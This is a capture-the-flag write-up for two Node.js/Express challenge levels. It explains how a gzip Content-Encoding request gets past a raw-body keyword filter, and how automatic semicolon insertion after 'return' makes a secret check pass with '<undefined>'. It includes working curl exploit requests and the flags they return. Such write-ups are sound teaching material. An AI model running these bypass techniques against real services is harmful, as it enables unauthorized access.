3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
const http = require('http')
const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5005
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

app.use(express.urlencoded({extended: false}))

app.post('/flag', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')

  if (req.body.secret !== 'ShowMeTheFlag') {
    res.end("Say the magic phrase!")
    return
  }

  if (req.youAreBanned) {
    res.end("How about no.")
    return
  }

  res.end(FLAG)
})

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 5\n\n")
  res.end(SOURCE)
})

const proxy = function(req, res) {
  req.youAreBanned = false
  let body = ''
  req
    .prependListener('data', (data) => { body += data })
    .prependListener('end', () => {
      const o = new URLSearchParams(body)
      req.youAreBanned = o.toString().includes("ShowMeTheFlag")
    })
  return app(req, res)
}

const server = http.createServer(proxy)
server.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

We can observe that the code above is similar to that of Level 4, with some changes.

The first change is the use of app.use(express.urlencoded({extended: false})) instead of app.use(express.text(...). The second change is the use of http.createServer(proxy) to intercept the raw request body data before passing to Express instead of using the verify option.

Similar to Level 4, req.youAreBanned = o.toString().includes("ShowMeTheFlag") assumes the charset encoding of the request body when performing the check.

But, when issuing the request, we see an error:

$ curl -H 'Content-Type: application/x-www-form-urlencoded; charset=utf-16le' --data-binary @<(python -c "print 'secret=ShowMeTheFlag'.encode('utf-16le')") 'http://challenges.gynvael.stream:5005/flag'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>UnsupportedMediaTypeError: unsupported charset &quot;UTF-16LE&quot;<br> &nbsp; &nbsp;at urlencodedParser (/usr/src/app/node_modules/body-parser/lib/types/urlencoded.js:108:12)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at trim_prefix (/usr/src/app/node_modules/express/lib/router/index.js:317:13)<br> &nbsp; &nbsp;at /usr/src/app/node_modules/express/lib/router/index.js:284:7<br> &nbsp; &nbsp;at Function.process_params (/usr/src/app/node_modules/express/lib/router/index.js:335:12)<br> &nbsp; &nbsp;at next (/usr/src/app/node_modules/express/lib/router/index.js:275:10)<br> &nbsp; &nbsp;at expressInit (/usr/src/app/node_modules/express/lib/middleware/init.js:40:5)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at trim_prefix (/usr/src/app/node_modules/express/lib/router/index.js:317:13)<br> &nbsp; &nbsp;at /usr/src/app/node_modules/express/lib/router/index.js:284:7</pre>
</body>
</html>

This is because express.urlencoded (urlencoded in body-parser) asserts if the charset encoding for Content-Type: application/x-www-form-urlencoded is utf-8. So, it is not possible to specify any other charset encoding.

Solution

Speaking of encoding, there’s one more thing we have yet to try – Content-Encoding.

Recall that the raw request body data is being not decoded before being checked in proxy(). This means that we can encode the contents, e.g. using gzip compression, and specify Content-Encoding: gzip header, and the gzip-compressed contents will be used in the proxy() function (which passes the first check). Then, the body will decoded by Express before passing to the /flag endpoint POST handler, which correctly sets secret=ShowMeTheFlag:

$ curl -H 'Content-Encoding: gzip' --data-binary @<(printf 'secret=ShowMeTheFlag' | gzip) 'http://challenges.gynvael.stream:5005/flag'
CTF{||SameAsLevel4ButDifferent||}

Flag:: CTF{||SameAsLevel4ButDifferent||}


Level 6

Problem

Target: http://challenges.gynvael.stream:5006
https://twitter.com/gynvael/status/1264504663791058945

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
const http = require('http')
const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5006
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

const checkSecret = (secret) => {
  return
    [
      secret.split("").reverse().join(""),
      "xor",
      secret.split("").join("-")
    ].join('+')
}

app.get('/flag', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')

  if (!req.query.secret1 || !req.query.secret2) {
    res.end("You are not even trying.")
    return
  }

  if (`<${checkSecret(req.query.secret1)}>` === req.query.secret2) {
    res.end(FLAG)
    return
  }

  res.end("Lul no.")
})

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 6\n\n")
  res.end(SOURCE)
})

app.listen(PORT, () => {
  console.log(`Example app listening at port ${PORT}`)
})

Analysis

Notice that checkSecret has a return keyword on line 13, but the value that was supposed to be returned is on the following lines.
This is a common mistake made when coding in JavaScript. In JavaScript, automatic semicolon insertion (ASI) is performed on some statements, such as return, that must be terminated with semicolons.

As such, a semicolon is automatically inserted after the return keyword and before the newline as such:

const checkSecret = (secret) => {
  return; // ASI performed here; below lines are ignored
    [
      secret.split("").reverse().join(""),
      "xor",
      secret.split("").join("-")
    ].join('+')
}

This means that effectively, undefined is being returned by the checkSecret arrow function expression.

Solution

To pass the checks, we simply set secret1 query string parameter to a non-empty value, and secret2 to <undefined>:

$ curl 'http://challenges.gynvael.stream:5006/flag?secret1=a&secret2=<undefined>'

CTF{||RevengeOfTheScript||}

Flag:: CTF{||RevengeOfTheScript||}